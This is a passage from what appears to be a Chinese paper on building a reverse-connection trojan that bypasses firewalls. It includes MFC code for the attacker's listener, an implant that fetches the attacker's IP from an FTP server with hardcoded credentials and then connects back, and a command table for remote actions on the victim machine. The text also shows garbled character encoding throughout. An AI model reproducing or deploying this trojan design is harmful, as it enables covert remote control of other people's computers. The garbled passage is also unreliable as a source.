濾規(guī)則來(lái)攔截木馬程序可以很有效地防止外部連接，所以有了對(duì)外部連接審查嚴(yán)格的防火墻，黑客在無(wú)法取得連接的情況下，這樣的木馬很難工作起來(lái)。再厲害的木馬也無(wú)所作為了。同樣，局域網(wǎng)內(nèi)通過(guò)代理上網(wǎng)的電腦，因?yàn)槭嵌嗯_(tái)共用代理服務(wù)器的IP地址，而本機(jī)沒(méi)有獨(dú)立的互聯(lián)網(wǎng)IP地址（只有局域網(wǎng)內(nèi)部的IP地址），所以此時(shí)木馬也不能正常使用，就是說(shuō)傳統(tǒng)型木馬不能訪問(wèn)裝有防火墻和在局域網(wǎng)內(nèi)部的服務(wù)端主機(jī)。在這種情況下，傳統(tǒng)的木馬已無(wú)用武之地，為了能繞過(guò)防火墻，充分利用防火墻對(duì)于向內(nèi)的連接往往會(huì)進(jìn)行非常嚴(yán)格的過(guò)濾，對(duì)于向外的連接卻疏于防范。內(nèi)部發(fā)起的連接請(qǐng)求無(wú)條件信任的特點(diǎn)，假冒是系統(tǒng)的合法網(wǎng)絡(luò)請(qǐng)求來(lái)取得對(duì)外的端口，再連接到木馬的客戶端，從而建立起服務(wù)端與客戶端的連接，達(dá)到控制目標(biāo)計(jì)算機(jī)的目的。進(jìn)而設(shè)計(jì)出一種新型木馬——反彈端口木馬。其建立連接的過(guò)程可用圖4來(lái)描述。如圖4所示，運(yùn)行在主控端計(jì)算機(jī)上的客戶端先創(chuàng)建一個(gè)套接字，綁定之后便處于監(jiān)聽(tīng)狀態(tài)，等待服務(wù)端的連接請(qǐng)求。目標(biāo)計(jì)算機(jī)上線后，同樣創(chuàng)建新的套接字，然后向客戶端發(fā)起連接請(qǐng)求，兩端建立好連接后，客戶端便可以向服務(wù)端發(fā)送請(qǐng)求數(shù)據(jù)，即命令，服務(wù)端收到命令后將執(zhí)行相應(yīng)的操作。這樣客戶端就達(dá)到控制被控端計(jì)算機(jī)的目的。4.2.2木馬連接過(guò)程實(shí)現(xiàn)假設(shè)攻擊網(wǎng)絡(luò)的拓?fù)浣Y(jié)構(gòu)如圖5所示，被攻擊者處于圖中的左端，IP地址為05，攻擊者處于圖中的右端，IP地址為31，由于一般主機(jī)上網(wǎng)的公網(wǎng)IP地址不是固定的，為了能讓服務(wù)端能準(zhǔn)確的連接到攻擊者的計(jì)算機(jī)，攻擊者必需讓服務(wù)端得到其最新的IP地址，所以木馬程序?yàn)榻鉀Q這一問(wèn)題，采用的辦法步驟如下：攻擊者每次開(kāi)機(jī)后運(yùn)行木馬的客戶端，程序處于監(jiān)聽(tīng)狀態(tài)；登錄圖中的FTP服務(wù)器，修改其中存有客戶端IP地址的文件ipaddress.txt，將自己當(dāng)前的IP地址寫入該文件中；被攻擊者開(kāi)機(jī)后會(huì)自動(dòng)運(yùn)行木馬的服務(wù)端，服務(wù)端程序首先去訪問(wèn)圖中的FTP服務(wù)器，下載ipaddress.txt文件到本地計(jì)算機(jī)上；服務(wù)端讀取ipaddress.txt文件獲取客戶端的IP地址，然后向該IP地址的主機(jī)發(fā)起連接請(qǐng)求；客戶端接受連接請(qǐng)求，連接建立成功。圖5攻擊網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)木馬客戶端運(yùn)行后應(yīng)先單擊“等待連接”來(lái)讓客戶端處于監(jiān)聽(tīng)狀態(tài)，單擊該按鈕將觸發(fā)clientDlg.cpp文件中事件函數(shù)OnConnectButton，其實(shí)現(xiàn)監(jiān)聽(tīng)的代碼如下所示：voidCClientDlg::OnConnectButton(){ MyClient.Create(20007);//MyClient對(duì)象調(diào)用Create方法，創(chuàng)建套接字，打開(kāi)2007端口 MyClient.Bind(20007);//綁定 MyClient.Listen(1);//監(jiān)聽(tīng)m_info.ReplaceSel("\r\n監(jiān)聽(tīng)中...");}木馬服務(wù)端運(yùn)行后，在連接前應(yīng)到FTP服務(wù)器上獲取客戶端的IP地址，其實(shí)現(xiàn)核心代碼如下：CInternetSessionsession;CFtpConnection*pConn=NULL;pConn=session.GetFtpConnection("31","admin","123456",21);//創(chuàng)建一個(gè)FTP連接對(duì)象CStringLocalFile;getcwd(LocalFile,80);pConn->GetFile("ipaddress.txt",LocalFile);//下載文件到本地pConn->Close();session.Close();服務(wù)端得到客戶端IP地址后應(yīng)該主動(dòng)向客戶端發(fā)起連接，其實(shí)現(xiàn)是在serverView.cpp中的Create函數(shù)中，核心代碼如下：CFileIpFile("ipaddress.txt",CFile::modeRead);//打開(kāi)當(dāng)前運(yùn)行文件路徑下的//ipaddress.txt文件IpFile.Read(p,20);//讀取文件，并將文件內(nèi)容存放在指針p中IpFile.Close();ip=CString(p);server.Create();//創(chuàng)建套按字server.Connect(ip,20007);//連接IP地址為ip的主機(jī)的20007端口客戶端在監(jiān)聽(tīng)狀態(tài)時(shí)收到連接請(qǐng)求后，將進(jìn)行接受請(qǐng)求，此過(guò)程是在MySocket.cpp中實(shí)現(xiàn)的，收到連接請(qǐng)求將觸發(fā)文件中的CMySocket類中的OnAccept()重載函數(shù)，其實(shí)現(xiàn)代碼如下，至此整個(gè)連接過(guò)程完成。voidCMySocket::OnAccept(intnErrorCode)//函數(shù)重載{ if(Accept(serversocket))//接受連接請(qǐng)求 { AfxMessageBox("與被控端連接成功!");//在客戶端彈出連接成功的信息提示框 };}木馬的遠(yuǎn)程控制功能設(shè)計(jì)木馬的功能實(shí)現(xiàn)在木馬的客戶端界面上分別添加“光驅(qū)彈出”、“光驅(qū)關(guān)閉”、“鼠標(biāo)移動(dòng)”等按鈕，并分別給它們添加事件驅(qū)動(dòng)函數(shù)。再雙擊按鈕為各函數(shù)添加代碼，代碼主要是通過(guò)套按字向服務(wù)端發(fā)送命令代碼字符串。在服務(wù)端的MySocket.cpp文件中的CMySocket類中重載OnReceive()函數(shù)，當(dāng)收到信息后就對(duì)命令代碼字符串進(jìn)行判定，通過(guò)其值去調(diào)用Actions類中的相應(yīng)函數(shù)。這些函數(shù)通過(guò)執(zhí)行代碼或調(diào)用系統(tǒng)的API函數(shù)讓被控計(jì)算機(jī)執(zhí)行相應(yīng)的操作。表2命令與函數(shù)對(duì)應(yīng)表表1按鈕與命令對(duì)應(yīng)表表2命令與函數(shù)對(duì)應(yīng)表表1按鈕與命令對(duì)應(yīng)表操作按鈕函數(shù)命令代碼OnDiskPopoutDISK_POP_OUTOnCoverScrSCREEN_COVEROnSendMesMESSAGE_POPOnDiskPopinDISK_POP_INOnCloseSerCLOSE_SERVEROnCloseMonitorMONITOR_SHUT_UPOnCursorMoveCURSOR_MOVEOnPlayMusicPLAY_MUSIC命令代碼發(fā)送命令代碼攻擊計(jì)算機(jī)點(diǎn)擊按鈕被攻擊計(jì)算機(jī)解讀命令調(diào)用函數(shù)命令代碼代碼命令代碼操作函數(shù)1DISK_POP_OUTDiskPopout()2SCREEN_COVERCoverScreen()3MESSAGE_POPShowMessage()4DISK_POP_INDiskPopin()5CLOSE_SERVERCloseAllDocuments()6MONITOR_SHUT_UPShutUpMonitor()7CURSOR_MOVECursorMove()8PLAY_MUSICPlayMusic()這樣在服務(wù)端與客戶端運(yùn)行并成功建立連接后，攻擊者通過(guò)點(diǎn)擊客戶端界面上的各種按鈕就能驅(qū)動(dòng)相應(yīng)的事件函數(shù)，在事件函數(shù)中向被攻擊計(jì)算機(jī)發(fā)送命令代碼，如圖5中表1的每一個(gè)操作按鈕與事件函數(shù)。此過(guò)程可用圖5的流程來(lái)描述木馬功能的實(shí)現(xiàn)過(guò)程。圖5中表1是客戶端操作按鈕與事件函數(shù)以及以及事件函數(shù)發(fā)送的命令代碼字符串的對(duì)應(yīng)表；表2是服務(wù)端命令代碼與相應(yīng)的操作函數(shù)對(duì)應(yīng)表。木馬的功能執(zhí)行過(guò)程由于木馬的各功能的執(zhí)行過(guò)程基本相同，不妨以“光驅(qū)彈出”按鈕為例來(lái)描述木馬功能的執(zhí)行過(guò)程。當(dāng)用戶單擊“光驅(qū)彈出”按鈕后，程序就執(zhí)行CClientDlg對(duì)話框類下的OnDiskPopout()事件函數(shù)，該函數(shù)將用語(yǔ)句MyClient.serversocket.message.uActtype=DISK_POP_OUT;把DISK_POP_OUT賦值給MyClient對(duì)象中的uActtype成員變量，然后利用MyClient的成員對(duì)象serversocket的Send方法把DISK_POP_OUT指令代碼發(fā)送到服務(wù)端，其VC代碼如下：MyClient.serversocket.Send((char*)(&MyClient.serversocket.message),2);最后在圖3中的信息欄中顯示“服務(wù)端光驅(qū)彈出”的提示信息和顯示當(dāng)前系統(tǒng)時(shí)間。VC代碼為：m_info.ReplaceSel("\r\n服務(wù)端光驅(qū)彈開(kāi)!");//在信息欄顯示提示信息GetServeTime();//得到系統(tǒng)時(shí)間被攻擊計(jì)算機(jī)的服務(wù)端收到數(shù)據(jù)包后觸發(fā)OnReceive()函數(shù),在該函數(shù)中首先是從數(shù)據(jù)緩沖區(qū)中讀取數(shù)據(jù)，并賦值給字符串變量strr，然后解讀strr中的uActtype變量，得到命令代碼，通過(guò)命令代碼的值去調(diào)用相應(yīng)的函數(shù)，在服務(wù)端程序中已經(jīng)對(duì)命令代碼進(jìn)行了宏定義，如DISK_POP_OUT就宏定義為1，不妨設(shè)獲取的命令代碼為DISK_POP_OUT，服務(wù)端就判定代碼為DISK_POP_OUT就執(zhí)行Actions類的MyAction對(duì)象中的DiskPopout()函數(shù)，在DiskPopout()函數(shù)體中的調(diào)用系統(tǒng)提供的函數(shù)mciSendString("SetcdAudiodooropenwait",NULL,0,NULL)；執(zhí)行語(yǔ)句服務(wù)端信道DISK_POP_OUTDISK_POP_OUTOnDiskPopout()執(zhí)行語(yǔ)句服務(wù)端信道DISK_POP_OUTDISK_POP_OUTOnDiskPopout()分析數(shù)據(jù)獲取命令代碼執(zhí)行函數(shù)發(fā)送命令代碼單擊按鈕DiskPopout()mciSendString("SetcdAudiodooropenwait",NULL,0,NULL)服務(wù)端光驅(qū)彈出產(chǎn)生效果客戶端調(diào)用函數(shù)圖6光驅(qū)彈出執(zhí)行流程圖與“光驅(qū)彈出”相同，攻擊者在單擊別的操作按鈕時(shí)也執(zhí)行相應(yīng)的函數(shù)，發(fā)送相應(yīng)的命令代碼，服務(wù)端收到數(shù)據(jù)后，首先解包獲取命令代碼，再根據(jù)命令調(diào)用對(duì)應(yīng)的操作函數(shù)，執(zhí)行相關(guān)語(yǔ)句產(chǎn)生相應(yīng)效果。測(cè)試測(cè)試環(huán)境AMD1800+處理器、256M內(nèi)存的計(jì)算機(jī)兩臺(tái)，一臺(tái)計(jì)算機(jī)裝有WindowsXP，另一臺(tái)裝有Windows2003并搭建FTP服務(wù)器。測(cè)試過(guò)程與結(jié)果讓兩臺(tái)計(jì)算機(jī)都通過(guò)校園網(wǎng)連接到Internet上，裝有Windows2003的計(jì)算機(jī)運(yùn)行木馬的客戶端來(lái)作為主控端，先在該計(jì)算機(jī)上搭建FTP服務(wù)器，在根目錄下建立名為ipaddress.txt文件，在文件中寫入主控端計(jì)算機(jī)的IP地址；裝有WindowsXP的計(jì)算機(jī)開(kāi)啟天網(wǎng)防火墻并運(yùn)行服務(wù)端作為被控端?？蛻舳藛螕簟暗却B接”按鈕讓客戶端處于監(jiān)聽(tīng)狀態(tài)，服務(wù)端運(yùn)行后，與客戶端建立連接成功后彈出連接成功對(duì)話框，如圖7所示。然后利用瑞星防火墻、江民